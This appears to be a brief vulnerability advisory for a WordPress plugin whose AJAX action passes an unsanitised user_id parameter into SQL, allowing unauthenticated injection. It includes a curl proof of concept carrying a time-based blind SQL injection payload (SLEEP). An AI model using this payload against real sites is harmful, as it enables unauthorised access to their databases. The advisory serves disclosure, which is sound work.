The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users
curl ‘https://example.com/wp-admin/admin-ajax.php’ --data ‘action=get-achievements&total;_only=true&user;_id=11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb’